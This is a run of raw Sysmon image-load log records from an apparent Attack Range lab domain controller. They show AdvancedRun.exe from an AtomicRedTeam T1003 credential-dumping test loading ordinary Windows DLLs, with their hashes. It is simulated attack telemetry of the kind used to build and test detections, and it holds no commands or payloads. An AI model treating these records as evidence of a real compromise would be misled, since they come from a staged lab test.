CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft 